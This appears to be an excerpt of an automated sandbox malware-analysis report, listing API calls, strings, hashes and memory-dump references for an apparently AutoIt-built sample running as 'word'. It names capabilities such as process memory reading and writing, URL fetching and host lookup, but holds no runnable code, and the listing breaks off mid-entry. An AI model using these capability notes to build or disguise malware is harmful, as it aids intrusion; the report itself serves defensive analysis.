• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: _wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 176396367-557222456
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• VariantInit.OLEAUT32(00000000), ref: 0042D2E0
• VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
• VariantClear.OLEAUT32(00000000), ref: 0042D2FF
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: Variant$ClearCopyInit_malloc
• String ID: 4RH
• API String ID: 2981388473-749298218
APIs
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• __wcsnicmp.LIBCMT ref: 0046681A
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT$HH
• API String ID: 3035604524-2728063697
APIs
  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32 ref: 004374E2
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32 ref: 004374A5
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: MessageSend$MemoryProcess$ReadWrite
• String ID: @
• API String ID: 4055202900-2766056989
APIs
• GetWindowRect.USER32(?,?), ref: 00449B2E
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449B9C
• SendMessageW.USER32(002BE158,00000469,?,00000000), ref: 00449BF7
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: Window$MessageMoveRectSend
• String ID: X+
• API String ID: 4269771112-1938338529
APIs
• MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
• SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
• InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
• SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
• ShowWindow.USER32(?,00000000), ref: 00440E62
• DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: MessageSendWindow$InvalidateMoveProcRectShow
• String ID: X+
• API String ID: 4037296999-1938338529
                                                                            APIs
                                                                            • MoveWindow.USER32(?,004A83D8,00000000,?,?,00000000), ref: 00440DC7
                                                                            • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440DE6
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00440E0C
                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 00440E3E
                                                                            • ShowWindow.USER32(?,00000000), ref: 00440E62
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440E7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$InvalidateMoveProcRectShow
                                                                            • String ID: X+
                                                                            • API String ID: 4037296999-1938338529
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset_wcslen
                                                                            • String ID: |
                                                                            • API String ID: 915713708-2343686810
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                            • HttpQueryInfoW.WININET ref: 0044A892
                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3705125965-3916222277
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000,?,000000F0), ref: 00450AB3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: AU3_GetPluginDetails
                                                                            • API String ID: 145871493-4132174516
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '$X+
                                                                            • API String ID: 3850602802-3202472624
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: X+
                                                                            • API String ID: 0-1938338529
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                            • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                            • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 0045125D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D2C7
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: HH
                                                                            • API String ID: 2507767853-2761332787
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                            • GetVolumeInformationW.KERNEL32 ref: 0045D4CE
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: HH
                                                                            • API String ID: 2507767853-2761332787
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,00000001,?), ref: 004515DA
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                            Strings
                                                                            • edit, xrefs: 00451651
                                                                            • 9aec3bede5bc963c9f658347f6bf9454ec55d0cc173df73d62f569748da7f94e0df043e2f55034834ab2e6ba84dc2e32e376ab574ffabc601897b0c7279b808d40, xrefs: 004515C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: 9aec3bede5bc963c9f658347f6bf9454ec55d0cc173df73d62f569748da7f94e0df043e2f55034834ab2e6ba84dc2e32e376ab574ffabc601897b0c7279b808d40$edit
                                                                            • API String ID: 2978978980-2171819551
                                                                            • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                            • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                            • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                            • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
APIs
• SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
• SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
• SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
• Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
• Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
APIs
  • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
• WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
• inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
• String ID: HH
• API String ID: 1515696956-2761332787
• Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
• Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
• Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetMenuItemInfoW.USER32 ref: 004497EA
• SetMenuItemInfoW.USER32 ref: 00449817
• DrawMenuBar.USER32(?,?,00000000,?), ref: 00449828
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: Menu$InfoItem$Draw_malloc
• String ID: 0
• API String ID: 772068139-4108050209
• Opcode ID: f9e456d65f37a3d64cb432bc1a1f977de8c9fc5d92ba122409fca0b229618a80
• Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
• Opcode Fuzzy Hash: f9e456d65f37a3d64cb432bc1a1f977de8c9fc5d92ba122409fca0b229618a80
• Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
APIs
• GetForegroundWindow.USER32 ref: 0044A37C
• GetFocus.USER32 ref: 0044A384
• SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: FocusForegroundMessageSendWindow
• String ID: X+
• API String ID: 944890605-1938338529
• Opcode ID: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
• Instruction ID: c96dbd3af6c5a13cf066609db195d3b9a892d089c32e0a7510d993dcc5c4d347
• Opcode Fuzzy Hash: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
• Instruction Fuzzy Hash: F1112F351802419BC7208F28D849EA77B71EB8A720F18065DFC4187391EB785893CB59
APIs
• GetForegroundWindow.USER32 ref: 0044A37C
• GetFocus.USER32 ref: 0044A384
• SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: FocusForegroundMessageSendWindow
• String ID: X+
• API String ID: 944890605-1938338529
• Opcode ID: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
• Instruction ID: 22bd45665fc9576d9632a8de694c1cf6a1f999350c1115eace43a942eb161fba
• Opcode Fuzzy Hash: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
• Instruction Fuzzy Hash: DF0188345402019BD7209F28D848A6B7B61EB8A724F28466EFC14973E1EB796892CB59
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AllocTask_wcslen
• String ID: hkG
• API String ID: 2651040394-3610518997
• Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
• Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
• Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
• Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
• Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
• Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
• Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004343DE
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
• Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
• Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
• Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
• Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043440D
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
• Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
• Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_word.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
• Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
• Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EE7B
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
Strings
Memory Dump Source
• Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp
